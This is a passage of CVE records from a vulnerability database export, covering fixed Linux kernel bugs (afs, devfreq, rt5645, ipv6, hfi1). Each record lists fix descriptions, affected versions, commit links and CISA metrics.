"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nafs: Increase buffer size in afs_update_volume_status()\n\nThe max length of volume-\u003evid value is 20 characters.\nSo increase idbuf[] size up to 24 to avoid overflow.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.\n\n[DH: Actually, it\u0027s 20 + NUL, so increase it to 24 and use snprintf()]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:15.534Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5c27d85a69fa16a08813ba37ddfb4bbc9a1ed6b5"
},
{
"url": "https://git.kernel.org/stable/c/d9b5e2b7a8196850383c70d099bfd39e81ab6637"
},
{
"url": "https://git.kernel.org/stable/c/e56662160fc24d28cb75ac095cc6415ae1bda43e"
},
{
"url": "https://git.kernel.org/stable/c/e8530b170e464017203e3b8c6c49af6e916aece1"
},
{
"url": "https://git.kernel.org/stable/c/6e6065dd25b661420fac19c34282b6c626fcd35e"
},
{
"url": "https://git.kernel.org/stable/c/d34a5e57632bb5ff825196ddd9a48ca403626dfa"
},
{
"url": "https://git.kernel.org/stable/c/6ea38e2aeb72349cad50e38899b0ba6fbcb2af3d"
}
],
"title": "afs: Increase buffer size in afs_update_volume_status()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26736",
"datePublished": "2024-04-03T17:00:22.693Z",
"dateReserved": "2024-02-19T14:20:24.166Z",
"dateUpdated": "2025-05-04T08:55:15.534Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52614 (GCVE-0-2023-52614)
Vulnerability from cvelistv5
Published
2024-03-18 10:14
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
PM / devfreq: Fix buffer overflow in trans_stat_show
Fix buffer overflow in trans_stat_show().
Convert simple snprintf to the more secure scnprintf with size of
PAGE_SIZE.
Add condition checking if we are exceeding PAGE_SIZE and exit early from
loop. Also add at the end a warning that we exceeded PAGE_SIZE and that
stats is disabled.
Return -EFBIG in the case where we don't have enough space to write the
full transition table.
Also document in the ABI that this function can return -EFBIG error.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e552bbaf5b987f57c43e6981a452b8a3c700b1ae Version: e552bbaf5b987f57c43e6981a452b8a3c700b1ae Version: e552bbaf5b987f57c43e6981a452b8a3c700b1ae Version: e552bbaf5b987f57c43e6981a452b8a3c700b1ae Version: e552bbaf5b987f57c43e6981a452b8a3c700b1ae Version: e552bbaf5b987f57c43e6981a452b8a3c700b1ae |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52614",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-18T15:34:29.560131Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-07T19:25:57.982Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.314Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/087de000e4f8c878c81d9dd3725f00a1d292980c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/796d3fad8c35ee9df9027899fb90ceaeb41b958f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a7729cda2dd276d7a3994638038fb89035b6f2c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a979f56aa4b93579cf0e4265ae04d7e9300fd3e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eaef4650fa2050147ca25fd7ee43bc0082e03c87"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/08e23d05fa6dc4fc13da0ccf09defdd4bbc92ff4"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"Documentation/ABI/testing/sysfs-class-devfreq",
"drivers/devfreq/devfreq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "087de000e4f8c878c81d9dd3725f00a1d292980c",
"status": "affected",
"version": "e552bbaf5b987f57c43e6981a452b8a3c700b1ae",
"versionType": "git"
},
{
"lessThan": "796d3fad8c35ee9df9027899fb90ceaeb41b958f",
"status": "affected",
"version": "e552bbaf5b987f57c43e6981a452b8a3c700b1ae",
"versionType": "git"
},
{
"lessThan": "8a7729cda2dd276d7a3994638038fb89035b6f2c",
"status": "affected",
"version": "e552bbaf5b987f57c43e6981a452b8a3c700b1ae",
"versionType": "git"
},
{
"lessThan": "a979f56aa4b93579cf0e4265ae04d7e9300fd3e8",
"status": "affected",
"version": "e552bbaf5b987f57c43e6981a452b8a3c700b1ae",
"versionType": "git"
},
{
"lessThan": "eaef4650fa2050147ca25fd7ee43bc0082e03c87",
"status": "affected",
"version": "e552bbaf5b987f57c43e6981a452b8a3c700b1ae",
"versionType": "git"
},
{
"lessThan": "08e23d05fa6dc4fc13da0ccf09defdd4bbc92ff4",
"status": "affected",
"version": "e552bbaf5b987f57c43e6981a452b8a3c700b1ae",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"Documentation/ABI/testing/sysfs-class-devfreq",
"drivers/devfreq/devfreq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.8"
},
{
"lessThan": "3.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPM / devfreq: Fix buffer overflow in trans_stat_show\n\nFix buffer overflow in trans_stat_show().\n\nConvert simple snprintf to the more secure scnprintf with size of\nPAGE_SIZE.\n\nAdd condition checking if we are exceeding PAGE_SIZE and exit early from\nloop. Also add at the end a warning that we exceeded PAGE_SIZE and that\nstats is disabled.\n\nReturn -EFBIG in the case where we don\u0027t have enough space to write the\nfull transition table.\n\nAlso document in the ABI that this function can return -EFBIG error."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:54.692Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/087de000e4f8c878c81d9dd3725f00a1d292980c"
},
{
"url": "https://git.kernel.org/stable/c/796d3fad8c35ee9df9027899fb90ceaeb41b958f"
},
{
"url": "https://git.kernel.org/stable/c/8a7729cda2dd276d7a3994638038fb89035b6f2c"
},
{
"url": "https://git.kernel.org/stable/c/a979f56aa4b93579cf0e4265ae04d7e9300fd3e8"
},
{
"url": "https://git.kernel.org/stable/c/eaef4650fa2050147ca25fd7ee43bc0082e03c87"
},
{
"url": "https://git.kernel.org/stable/c/08e23d05fa6dc4fc13da0ccf09defdd4bbc92ff4"
}
],
"title": "PM / devfreq: Fix buffer overflow in trans_stat_show",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52614",
"datePublished": "2024-03-18T10:14:44.929Z",
"dateReserved": "2024-03-06T09:52:12.089Z",
"dateUpdated": "2025-05-04T07:39:54.692Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26722 (GCVE-0-2024-26722)
Vulnerability from cvelistv5
Published
2024-04-03 14:55
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ASoC: rt5645: Fix deadlock in rt5645_jack_detect_work()
There is a path in rt5645_jack_detect_work(), where rt5645->jd_mutex
is left locked forever. That may lead to deadlock
when rt5645_jack_detect_work() is called for the second time.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 48ce529c83522944f116f03884819051f44f0fb6 Version: b67005b284ddaf62043468d1ce5905c17d85b0e6 Version: ffe13302b8fd486f80c98019bdcb7f3e512d0eda Version: 7a3ff8a2bb2620ba6a806f0967c38be1a8d306d9 Version: 1613195bf31e68b192bc731bea71726773e3482f Version: 8f82f2e4d9c4966282e494ae67b0bc05a6c2b904 Version: cdba4301adda7c60a2064bf808e48fccd352aaa9 Version: cdba4301adda7c60a2064bf808e48fccd352aaa9 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26722",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T17:40:07.128865Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:40.322Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.917Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3dd2d99e2352903d0e0b8769e6c9b8293c7454b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/422d5243b9f780abd3d39da2b746e3915677b07d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a98bc739d0753a5810ce5630943cd7614c7717e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d14b8e2005f36319df9412d42037416d64827f6b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1f0d7792e9023e8658e901b7b76a555f6aa052ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/050ad2ca0ac169dd9e552075d2c6af1bbb46534c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed5b8b735369b40d6c1f8ef3e62d369f74b4c491"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ef5d5b92f7117b324efaac72b3db27ae8bb3082"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/soc/codecs/rt5645.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3dd2d99e2352903d0e0b8769e6c9b8293c7454b2",
"status": "affected",
"version": "48ce529c83522944f116f03884819051f44f0fb6",
"versionType": "git"
},
{
"lessThan": "422d5243b9f780abd3d39da2b746e3915677b07d",
"status": "affected",
"version": "b67005b284ddaf62043468d1ce5905c17d85b0e6",
"versionType": "git"
},
{
"lessThan": "4a98bc739d0753a5810ce5630943cd7614c7717e",
"status": "affected",
"version": "ffe13302b8fd486f80c98019bdcb7f3e512d0eda",
"versionType": "git"
},
{
"lessThan": "d14b8e2005f36319df9412d42037416d64827f6b",
"status": "affected",
"version": "7a3ff8a2bb2620ba6a806f0967c38be1a8d306d9",
"versionType": "git"
},
{
"lessThan": "1f0d7792e9023e8658e901b7b76a555f6aa052ec",
"status": "affected",
"version": "1613195bf31e68b192bc731bea71726773e3482f",
"versionType": "git"
},
{
"lessThan": "050ad2ca0ac169dd9e552075d2c6af1bbb46534c",
"status": "affected",
"version": "8f82f2e4d9c4966282e494ae67b0bc05a6c2b904",
"versionType": "git"
},
{
"lessThan": "ed5b8b735369b40d6c1f8ef3e62d369f74b4c491",
"status": "affected",
"version": "cdba4301adda7c60a2064bf808e48fccd352aaa9",
"versionType": "git"
},
{
"lessThan": "6ef5d5b92f7117b324efaac72b3db27ae8bb3082",
"status": "affected",
"version": "cdba4301adda7c60a2064bf808e48fccd352aaa9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/soc/codecs/rt5645.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.7"
},
{
"lessThan": "6.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.19.306",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.4.268",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.10.209",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.15.148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "6.1.74",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "6.6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: rt5645: Fix deadlock in rt5645_jack_detect_work()\n\nThere is a path in rt5645_jack_detect_work(), where rt5645-\u003ejd_mutex\nis left locked forever. That may lead to deadlock\nwhen rt5645_jack_detect_work() is called for the second time.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:54.183Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3dd2d99e2352903d0e0b8769e6c9b8293c7454b2"
},
{
"url": "https://git.kernel.org/stable/c/422d5243b9f780abd3d39da2b746e3915677b07d"
},
{
"url": "https://git.kernel.org/stable/c/4a98bc739d0753a5810ce5630943cd7614c7717e"
},
{
"url": "https://git.kernel.org/stable/c/d14b8e2005f36319df9412d42037416d64827f6b"
},
{
"url": "https://git.kernel.org/stable/c/1f0d7792e9023e8658e901b7b76a555f6aa052ec"
},
{
"url": "https://git.kernel.org/stable/c/050ad2ca0ac169dd9e552075d2c6af1bbb46534c"
},
{
"url": "https://git.kernel.org/stable/c/ed5b8b735369b40d6c1f8ef3e62d369f74b4c491"
},
{
"url": "https://git.kernel.org/stable/c/6ef5d5b92f7117b324efaac72b3db27ae8bb3082"
}
],
"title": "ASoC: rt5645: Fix deadlock in rt5645_jack_detect_work()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26722",
"datePublished": "2024-04-03T14:55:21.709Z",
"dateReserved": "2024-02-19T14:20:24.163Z",
"dateUpdated": "2025-05-04T08:54:54.183Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27417 (GCVE-0-2024-27417)
Vulnerability from cvelistv5
Published
2024-05-17 11:51
Modified
2025-05-04 09:04
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix potential "struct net" leak in inet6_rtm_getaddr()
It seems that if userspace provides a correct IFA_TARGET_NETNSID value
but no IFA_ADDRESS and IFA_LOCAL attributes, inet6_rtm_getaddr()
returns -EINVAL with an elevated "struct net" refcount.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 Version: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 Version: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 Version: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 Version: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 Version: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 Version: 6ecf4c37eb3e89b0832c9616089a5cdca3747da7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27417",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T14:19:39.323921Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:02.660Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.216Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d4ffb5b9d879a75e4f7460e8b10e756b4dfb132"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/810fa7d5e5202fcfb22720304b755f1bdfd4c174"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a54834c03c30e549c33d5da0975f3e1454ec906"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b0998fdd85776775d975d0024bca227597e836a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/44112bc5c74e64f28f5a9127dc34066c7a09bd0f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/33a1b6bfef6def2068c8703403759024ce17053e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10bfd453da64a057bcfd1a49fb6b271c48653cdb"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/addrconf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9d4ffb5b9d879a75e4f7460e8b10e756b4dfb132",
"status": "affected",
"version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
"versionType": "git"
},
{
"lessThan": "810fa7d5e5202fcfb22720304b755f1bdfd4c174",
"status": "affected",
"version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
"versionType": "git"
},
{
"lessThan": "8a54834c03c30e549c33d5da0975f3e1454ec906",
"status": "affected",
"version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
"versionType": "git"
},
{
"lessThan": "1b0998fdd85776775d975d0024bca227597e836a",
"status": "affected",
"version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
"versionType": "git"
},
{
"lessThan": "44112bc5c74e64f28f5a9127dc34066c7a09bd0f",
"status": "affected",
"version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
"versionType": "git"
},
{
"lessThan": "33a1b6bfef6def2068c8703403759024ce17053e",
"status": "affected",
"version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
"versionType": "git"
},
{
"lessThan": "10bfd453da64a057bcfd1a49fb6b271c48653cdb",
"status": "affected",
"version": "6ecf4c37eb3e89b0832c9616089a5cdca3747da7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/addrconf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix potential \"struct net\" leak in inet6_rtm_getaddr()\n\nIt seems that if userspace provides a correct IFA_TARGET_NETNSID value\nbut no IFA_ADDRESS and IFA_LOCAL attributes, inet6_rtm_getaddr()\nreturns -EINVAL with an elevated \"struct net\" refcount."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:04:42.491Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9d4ffb5b9d879a75e4f7460e8b10e756b4dfb132"
},
{
"url": "https://git.kernel.org/stable/c/810fa7d5e5202fcfb22720304b755f1bdfd4c174"
},
{
"url": "https://git.kernel.org/stable/c/8a54834c03c30e549c33d5da0975f3e1454ec906"
},
{
"url": "https://git.kernel.org/stable/c/1b0998fdd85776775d975d0024bca227597e836a"
},
{
"url": "https://git.kernel.org/stable/c/44112bc5c74e64f28f5a9127dc34066c7a09bd0f"
},
{
"url": "https://git.kernel.org/stable/c/33a1b6bfef6def2068c8703403759024ce17053e"
},
{
"url": "https://git.kernel.org/stable/c/10bfd453da64a057bcfd1a49fb6b271c48653cdb"
}
],
"title": "ipv6: fix potential \"struct net\" leak in inet6_rtm_getaddr()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27417",
"datePublished": "2024-05-17T11:51:07.803Z",
"dateReserved": "2024-02-25T13:47:42.683Z",
"dateUpdated": "2025-05-04T09:04:42.491Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26839 (GCVE-0-2024-26839)
Vulnerability from cvelistv5
Published
2024-04-17 10:10
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
IB/hfi1: Fix a memleak in init_credit_return
When dma_alloc_coherent fails to allocate dd->cr_base[i].va,
init_credit_return should deallocate dd->cr_base and
dd->cr_base[i] that allocated before. Or those resources
would be never freed and a memleak is triggered.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
